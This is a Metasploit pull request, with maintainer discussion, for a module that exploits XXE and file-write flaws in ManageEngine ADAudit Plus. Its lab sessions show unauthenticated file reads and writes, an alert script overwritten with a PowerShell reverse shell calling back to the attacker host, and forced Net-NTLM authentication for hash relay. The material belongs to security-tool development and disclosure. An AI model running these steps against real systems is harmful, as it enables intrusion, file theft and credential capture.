Add ManageEngine ADAudit Plus auxiliary module for builds 7060 and prior

[ErikWynter]

About

This change adds an auxiliary module (with docs) that exploits unauthenticated XXE (CVE-2021-42847 and CVE-2022-28219) and arbitrary file write (CVE-2021-42847) vulnerabilities in ManageEngine ADAudit Plus in order to perform a variety of unauthenticated actions including arbitrary file read, arbitrary file write and triggering Net-NTLM authentication.
The following five actions are supported:

• READ_FILE_OR_DIR: Read the contents of a file or directory specified via FILE_OR_DIR_PATH.
• WRITE_FILE: Write a JSON-compatible (UTF-8) payload to a file specified via FILE_OR_DIR_PATH.
• LIST_ALERT_SCRIPTS: Locate and list the contents of <install_dir>/alert_scripts/ if this directory exists.
• OVERWRITE_ALERT_SCRIPT: Overwrite the contents of an existing PowerShell script in <install_dir>/alert_scripts/ with a payload.
• TRIGGER_NTLM_AUTH: Trigger Net-NTLM authentication from the target (for hash capture/relaying via Responder/impacket-ntlmrelayx etc.

This module has been successfully tested against ManageEngine ADAudit Plus 7005 running on Windows Server 2012 R2.

Vulnerable Application

• The WRITE_FILE and OVERWRITE_ALERT_SCRIPT actions can be used to target ManageEngine ADAudit Plus builds prior to 7006.
• The READ_FILE_OR_DIR, LIST_ALERT_SCRIPTS and TRIGGER_NTLM_AUTH actions affect builds prior to 7060 if the XXE_VECTOR option is set to CVE-2022-28219 (default).

Writeup and demo videos

I have published a writeup that covers the attacks that this module exploits.

In addition, I have created the following demo videos:

1. This video for the READ_FILE_OR_DIR action
2. This video for the WRITE_FILE action
3. This video for the TRIGGER_NTLM_AUTH action
4. This video for the LIST_ALERT_SCRIPTS and OVERWRITE_ALERT_SCRIPT actions.

Conditional unauthenticated RCE

It should be noted that under certain non-default circumstances, the LIST_ALERT_SCRIPTS and OVERWRITE_ALERT_SCRIPT actions can be used as part of a broader attempt to achieve unauthenticated RCE on ADAudit Plus builds 7004 and 7005. The requirements for this are detailed in my writeup and video 4 (see previous section), shows what the full attack could look like in practice.

Overlap with manageengine_adaudit_plus_cve_2022_28219

This module uses quite a lot of code that is currently part of the manageengine_adaudit_plus_cve_2022_28219 exploit module by @rbowes-r7 . This is because aspects of this module cover the same vulnerability (CVE-2022-28219). More specifically, the READ_FILE_OR_DIR and LIST_ALERT_SCRIPTS actions take advantage of the same XXE FTP server used in that module in order to obtain directory listings and file contents. It would probably make sense to move most of the duplicate code to a mixin. I'd be happy to do the heavy lifting for that.

Installation Information

Vulnerable versions of ADAudit Plus are available here.

After running the installer, you can launch ADAudit Plus by opening Command Prompt with administrator privileges
and then running: <install_dir>\bin\run.bat

Scenarios

ManageEngine ADAudit Plus build 7005 running on Windows Server 2012 R2 - READ_FILE_OR_DIR

msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > options 

Module options (auxiliary/admin/http/manageengine_adaudit_plus_file_read_write):

   Name              Current Setting   Required  Description
   ----              ---------------   --------  -----------
   ALERT_SCRIPT                        no        Name of an existing PowerShell script in /alert_scripts to overwrite when using OVERWRITE_ALERT_SCRIPT
   CUSTOM_PAYLOAD                      no        Custom payload to use for WRITE_FILE and OVERWRITE_ALERT_SCRIPT. Ignored if USE_MSF_PAYLOAD is true
   DOMAIN                              no        Active Directory domain that the target monitors, Required if XXE VECTOR is CVE-2022-28219
   FILE_OR_DIR_PATH  /windows/win.ini  no        Path to read or write to. For read operations this should contain forward slashes and exclude the drive
   LHOST                               no        The local IP address to use for write operations with USE_MSF_PAYLOAD, or for receiving NTLM auth requests (TRIGGER_NTLM_AUTH)
   LOAD_MODULES                        no        A list of powershell modules separated by a comma to download over the web
   LPORT             4444              no        The listening port to use when using USE_MSF_PAYLOAD
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.91.250    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             8081              yes       The target port (TCP)
   SRVHOST           192.168.91.195    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresse
                                                 s.
   SRVPORT           8080              yes       The local port to listen on.
   SRVPORT_FTP       2121              yes       Port for FTP reverse connection
   SRVPORT_HTTP2     8888              yes       Port for additional HTTP reverse connections
   SSL               false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                             no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI         /                 yes       The base path to ManageEngine ADAudit Plus
   URIPATH                             no        The URI to use for this exploit (default is random)
   USE_MSF_PAYLOAD   true              no        Use the cmd/windows/powershell_reverse_tcp payload for WRITE_FILE and OVERWRITE_ALERT_SCRIPT.
   VHOST                               no        HTTP server virtual host
   XXE_VECTOR        CVE-2021-42847    no        XXE vector for obtaining file contents/directory listings (CVE-2022-28219 or CVE-2021-42847)


Auxiliary action:

   Name              Description
   ----              -----------
   READ_FILE_OR_DIR  Read the contents of a file or directory specified via FILE_OR_DIR_PATH


msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set FILE_OR_DIR_PATH /users/
FILE_OR_DIR_PATH => /users/
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Getting contents for /users/ via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/lREPlWhKGqjI.dtd
[+] Received the following contents for /users/:
Administrator
All Users
Default
Default User
desktop.ini
karen
Public
[*] Server stopped.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set FILE_OR_DIR_PATH /users/karen/
FILE_OR_DIR_PATH => /users/karen/
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Getting contents for /users/karen/ via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/TSFkWlLFTdd.dtd
[+] Received the following contents for /users/karen/:
secret.txt
[*] Server stopped.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set FILE_OR_DIR_PATH /users/karen/secret.txt
FILE_OR_DIR_PATH => /users/karen/secret.txt
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Getting contents for /users/karen/secret.txt via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/BhCFXqLZayD.dtd
[+] Received the following contents for /users/karen/secret.txt:
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you

ManageEngine ADAudit Plus build 7005 running on Windows Server 2012 R2 - WRITE_FILE

msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set action WRITE_FILE 
action => WRITE_FILE
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set FILE_OR_DIR_PATH /users/karen/pwned.txt
FILE_OR_DIR_PATH => /users/karen/pwned.txt
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set use_msf_payload false
use_msf_payload => false
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set custom_payload wynter was here
custom_payload => wynter was here
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > options 

Module options (auxiliary/admin/http/manageengine_adaudit_plus_file_read_write):

   Name              Current Setting         Required  Description
   ----              ---------------         --------  -----------
   ALERT_SCRIPT                              no        Name of an existing PowerShell script in /alert_scripts to overwrite when using OVERWRITE_ALERT_SCRIPT
   CUSTOM_PAYLOAD    wynter was here         no        Custom payload to use for WRITE_FILE and OVERWRITE_ALERT_SCRIPT. Ignored if USE_MSF_PAYLOAD is true
   DOMAIN                                    no        Active Directory domain that the target monitors, Required if XXE VECTOR is CVE-2022-28219
   FILE_OR_DIR_PATH  /users/karen/pwned.txt  no        Path to read or write to. For read operations this should contain forward slashes and exclude the drive
   LHOST                                     no        The local IP address to use for write operations with USE_MSF_PAYLOAD, or for receiving NTLM auth requests (TRIGGER_NTLM_AUTH
                                                       )
   LOAD_MODULES                              no        A list of powershell modules separated by a comma to download over the web
   LPORT             4444                    no        The listening port to use when using USE_MSF_PAYLOAD
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.91.250          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             8081                    yes       The target port (TCP)
   SRVHOST           192.168.91.195          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all ad
                                                       dresses.
   SRVPORT           8080                    yes       The local port to listen on.
   SRVPORT_FTP       2121                    yes       Port for FTP reverse connection
   SRVPORT_HTTP2     8888                    yes       Port for additional HTTP reverse connections
   SSL               false                   no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                   no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI         /                       yes       The base path to ManageEngine ADAudit Plus
   URIPATH                                   no        The URI to use for this exploit (default is random)
   USE_MSF_PAYLOAD   false                   no        Use the cmd/windows/powershell_reverse_tcp payload for WRITE_FILE and OVERWRITE_ALERT_SCRIPT.
   VHOST                                     no        HTTP server virtual host
   XXE_VECTOR        CVE-2021-42847          no        XXE vector for obtaining file contents/directory listings (CVE-2022-28219 or CVE-2021-42847)


Auxiliary action:

   Name        Description
   ----        -----------
   WRITE_FILE  Write a JSON-compatible (UTF-8) payload to a file specified via FILE_OR_DIR_PATH


msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Attempting to write the payload to 
[+] Successfully uploaded the payload
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set action READ_FILE_OR_DIR 
action => READ_FILE_OR_DIR
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Getting contents for /users/karen/pwned.txt via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/IaLexyrHsSlcg.dtd
[+] Received the following contents for /users/karen/pwned.txt:
wynter was here
[*] Server stopped.
[*] Auxiliary module execution completed

ManageEngine ADAudit Plus build 7005 running on Windows Server 2012 R2 - LIST_ALERT_SCRIPTS

msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > options 

Module options (auxiliary/admin/http/manageengine_adaudit_plus_file_read_write):

   Name              Current Setting   Required  Description
   ----              ---------------   --------  -----------
   ALERT_SCRIPT                        no        Name of an existing PowerShell script in /alert_scripts to overwrite when using OVERWRITE_ALERT_SCRIPT
   CUSTOM_PAYLOAD                      no        Custom payload to use for WRITE_FILE and OVERWRITE_ALERT_SCRIPT. Ignored if USE_MSF_PAYLOAD is true
   DOMAIN                              no        Active Directory domain that the target monitors, Required if XXE VECTOR is CVE-2022-28219
   FILE_OR_DIR_PATH  /windows/win.ini  no        Path to read or write to. For read operations this should contain forward slashes and exclude the drive
   LHOST                               no        The local IP address to use for write operations with USE_MSF_PAYLOAD, or for receiving NTLM auth requests (TRIGGER_NTLM_AUTH)
   LOAD_MODULES                        no        A list of powershell modules separated by a comma to download over the web
   LPORT             4444              no        The listening port to use when using USE_MSF_PAYLOAD
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.91.250    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             8081              yes       The target port (TCP)
   SRVHOST           192.168.91.195    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresse
                                                 s.
   SRVPORT           8080              yes       The local port to listen on.
   SRVPORT_FTP       2121              yes       Port for FTP reverse connection
   SRVPORT_HTTP2     8888              yes       Port for additional HTTP reverse connections
   SSL               false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                             no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI         /                 yes       The base path to ManageEngine ADAudit Plus
   URIPATH                             no        The URI to use for this exploit (default is random)
   USE_MSF_PAYLOAD   true              no        Use the cmd/windows/powershell_reverse_tcp payload for WRITE_FILE and OVERWRITE_ALERT_SCRIPT.
   VHOST                               no        HTTP server virtual host
   XXE_VECTOR        CVE-2021-42847    no        XXE vector for obtaining file contents/directory listings (CVE-2022-28219 or CVE-2021-42847)


Auxiliary action:

   Name                Description
   ----                -----------
   LIST_ALERT_SCRIPTS  Locate and list the contents of alert_scripts/ in the ADAudit Plus install directory


msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Getting contents for /Program Files/ManageEngine/ADAudit Plus/ via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/WFcOjOdALpjc.dtd
[*] Found the ADAudit Plus installation folder at /Program Files/ManageEngine/ADAudit Plus/.
[*] XXE_VECTOR is CVE-2021-42847. Sleeping 5 seconds before proceeding to ensure the duplicate requests for /Program Files/ManageEngine/ADAudit Plus/ have been processed
[*] Checking for existing alert scripts at /Program Files/ManageEngine/ADAudit Plus/alert_scripts/
[*] Getting contents for /Program Files/ManageEngine/ADAudit Plus/alert_scripts/ via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/SSZaswSACXsRnu.dtd
[+] Found 1 PowerShell script(s) in /alert_scripts/:
user_lockout.ps1
[*] You can overwrite any PowerShell script with a PSH reverse shell via OVERWRITE_ALERT_SCRIPT together with USE_MSF_PAYLOAD
[*] Auxiliary module execution completed

OVERWRITE_ALERT_SCRIPT

msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > options 

Module options (auxiliary/admin/http/manageengine_adaudit_plus_file_read_write):

   Name              Current Setting   Required  Description
   ----              ---------------   --------  -----------
   ALERT_SCRIPT      user_lockout.ps1  no        Name of an existing PowerShell script in /alert_scripts to overwrite when using OVERWRITE_ALERT_SCRIPT
   CUSTOM_PAYLOAD                      no        Custom payload to use for WRITE_FILE and OVERWRITE_ALERT_SCRIPT. Ignored if USE_MSF_PAYLOAD is true
   DOMAIN                              no        Active Directory domain that the target monitors, Required if XXE VECTOR is CVE-2022-28219
   FILE_OR_DIR_PATH  /windows/win.ini  no        Path to read or write to. For read operations this should contain forward slashes and exclude the drive
   LHOST             192.168.91.195    no        The local IP address to use for write operations with USE_MSF_PAYLOAD, or for receiving NTLM auth requests (TRIGGER_NTLM_AUTH)
   LOAD_MODULES                        no        A list of powershell modules separated by a comma to download over the web
   LPORT             4444              no        The listening port to use when using USE_MSF_PAYLOAD
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.91.250    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             8081              yes       The target port (TCP)
   SRVHOST           192.168.91.195    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresse
                                                 s.
   SRVPORT           8080              yes       The local port to listen on.
   SRVPORT_FTP       2121              yes       Port for FTP reverse connection
   SRVPORT_HTTP2     8888              yes       Port for additional HTTP reverse connections
   SSL               false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                             no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI         /                 yes       The base path to ManageEngine ADAudit Plus
   URIPATH                             no        The URI to use for this exploit (default is random)
   USE_MSF_PAYLOAD   true              no        Use the cmd/windows/powershell_reverse_tcp payload for WRITE_FILE and OVERWRITE_ALERT_SCRIPT.
   VHOST                               no        HTTP server virtual host
   XXE_VECTOR        CVE-2021-42847    no        XXE vector for obtaining file contents/directory listings (CVE-2022-28219 or CVE-2021-42847)


Auxiliary action:

   Name                    Description
   ----                    -----------
   OVERWRITE_ALERT_SCRIPT  Overwrite the contents of an existing PowerShell script in alert_scripts/ with a payload


msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Performing sanity check to see if user_lockout.ps1 exists...
[*] Getting contents for /Program Files/ManageEngine/ADAudit Plus/ via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/wOmkRtXagck.dtd
[*] Found the ADAudit Plus installation folder at /Program Files/ManageEngine/ADAudit Plus/.
[*] XXE_VECTOR is CVE-2021-42847. Sleeping 5 seconds before proceeding to ensure the duplicate requests for /Program Files/ManageEngine/ADAudit Plus/ have been processed
[*] Checking for existing alert scripts at /Program Files/ManageEngine/ADAudit Plus/alert_scripts/
[*] Getting contents for /Program Files/ManageEngine/ADAudit Plus/alert_scripts/ via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/AnjjjwMR.dtd
[*] Confirmed that user_lockout.ps1 exists in /alert_scripts
[*] Attempting to overwrite the alert script user_lockout.ps1 with the payload
[+] Successfully wrote the payload to user_lockout.ps1
[*] Auxiliary module execution completed

TRIGGER_NTLM_AUTH

msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > options 

Module options (auxiliary/admin/http/manageengine_adaudit_plus_file_read_write):

   Name              Current Setting   Required  Description
   ----              ---------------   --------  -----------
   ALERT_SCRIPT                        no        Name of an existing PowerShell script in /alert_scripts to overwrite when using OVERWRITE_ALERT_SCRIPT
   CUSTOM_PAYLOAD                      no        Custom payload to use for WRITE_FILE and OVERWRITE_ALERT_SCRIPT. Ignored if USE_MSF_PAYLOAD is true
   DOMAIN                              no        Active Directory domain that the target monitors, Required if XXE VECTOR is CVE-2022-28219
   FILE_OR_DIR_PATH  /windows/win.ini  no        Path to read or write to. For read operations this should contain forward slashes and exclude the drive
   LHOST             192.168.91.195    no        The local IP address to use for write operations with USE_MSF_PAYLOAD, or for receiving NTLM auth requests (TRIGGER_NTLM_AUTH)
   LOAD_MODULES                        no        A list of powershell modules separated by a comma to download over the web
   LPORT             4444              no        The listening port to use when using USE_MSF_PAYLOAD
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.91.250    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             8081              yes       The target port (TCP)
   SRVHOST           192.168.91.195    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresse
                                                 s.
   SRVPORT           8080              yes       The local port to listen on.
   SRVPORT_FTP       2121              yes       Port for FTP reverse connection
   SRVPORT_HTTP2     8888              yes       Port for additional HTTP reverse connections
   SSL               false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                             no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI         /                 yes       The base path to ManageEngine ADAudit Plus
   URIPATH                             no        The URI to use for this exploit (default is random)
   USE_MSF_PAYLOAD   true              no        Use the cmd/windows/powershell_reverse_tcp payload for WRITE_FILE and OVERWRITE_ALERT_SCRIPT.
   VHOST                               no        HTTP server virtual host
   XXE_VECTOR        CVE-2021-42847    no        XXE vector for obtaining file contents/directory listings (CVE-2022-28219 or CVE-2021-42847)


Auxiliary action:

   Name               Description
   ----               -----------
   TRIGGER_NTLM_AUTH  Trigger Net-NTLM authentication from the target (for hash capture/relaying via Responder/impacket-ntlmrelayx etc)


msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Triggering Net-NTLM authentication from the target to http://192.168.91.195
[*] Auxiliary module execution completed

[gwillcox-r7]

@ErikWynter Does this need updating to pull in the updates from #17133? Would love to review this and get this landed but think we need some reworking to ensure that we aren't duplicating work or using the incorrect functions.

Adding the delayed tag until this is updated to use the updates from #17133

[ErikWynter]

@gwillcox-r7 hey yeah I'll need to update the branch to get those updates and then adjust some of the code to utilize the final version of the mixin. Before I do that though, I wanted to ask you about the code reuse between this PR and the manageengine_adaudit_plus_cve_2022_28219 . This PR uses almost the exact same code for the XXE FTP server, so I was wondering if you'd prefer me to move that to a mixin, or if it's okay like this? The mixin option would prevent code reuse but would of course require a lot more work, including changes to the manageengine_adaudit_plus_cve_2022_28219 module, which I didn't write, so I don't want to start making changes without prior approval of some kind :)

[gwillcox-r7]

@gwillcox-r7 hey yeah I'll need to update the branch to get those updates and then adjust some of the code to utilize the final version of the mixin. Before I do that though, I wanted to ask you about the code reuse between this PR and the manageengine_adaudit_plus_cve_2022_28219 . This PR uses almost the exact same code for the XXE FTP server, so I was wondering if you'd prefer me to move that to a mixin, or if it's okay like this? The mixin option would prevent code reuse but would of course require a lot more work, including changes to the manageengine_adaudit_plus_cve_2022_28219 module, which I didn't write, so I don't want to start making changes without prior approval of some kind :)

For the XXE FTP server code, if you reasonably believe that it could be something that would be generic enough to be used across multiple modules, and we don't have existing code for it already, I'd strongly recommend putting it into a mixin/library to ease future module developer's efforts. If however you think its just the case that these two happened to need this code but its not a generic technique that other exploits might use, then I'd be okay with it being reused so long as we noted this somewhere.

[ErikWynter]

@gwillcox-r7 thanks, yeah honestly I think this is a relatively isolated case. While the technique on paper could work against various Java apps, it seems exceedingly rare. The reason both modules use the same code is that they exploit the same vulnerability type in the exact same product. So based on what you mention I think for we can just keep it in the module for now. If we start seeing this more often, a library is always still a possibility, but I highly doubt that

[gwillcox-r7]

@gwillcox-r7 thanks, yeah honestly I think this is a relatively isolated case. While the technique on paper could work against various Java apps, it seems exceedingly rare. The reason both modules use the same code is that they exploit the same vulnerability type in the exact same product. So based on what you mention I think for we can just keep it in the module for now. If we start seeing this more often, a library is always still a possibility, but I highly doubt that

Sounds good to me!

[bwatters-r7]

@ErikWynter any updates on pullng that code in?

[ErikWynter]

@bwatters-r7 thanks for the reminder, I keep forgetting about this one. I'll try and push the required changes for it this week or the next.

[ErikWynter]

Hey I didn't forget about this but I haven't been able to find the time. I'll keep trying though

[adfoster-r7]

Was just running through the PR queue to see what's possible to land; Do we want to temporarily close this pull request? Or can this land as an interim PR? 👀

[ErikWynter]

@adfoster-r7 sorry for the continued delays on this. I haven't forgotten about this but I had some urgent projects I needed to wrap up first. I'm almost done with that and will get back to this PR after. I can't given an exact date, but I will make sure to push the required changes in December. Would that work?

[smcintyre-r7]

I'm going to attic this until you're able to get back around to it. When that time comes just let one of us know and we'd be happy to reopen it for you!

[github-actions]

Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it attic and closed it for now.

What does this generally mean? It could be one or more of several things:

• It doesn't look like there has been any activity on this pull request in a while
• We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
• Sometimes the implementation isn't quite right and a different approach is necessary.

We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!

[ErikWynter]

@smcintyre-r7 hey yeah that makes sense. I haven't forgotten about it, but I have no clue when I'll have time again. Thanks!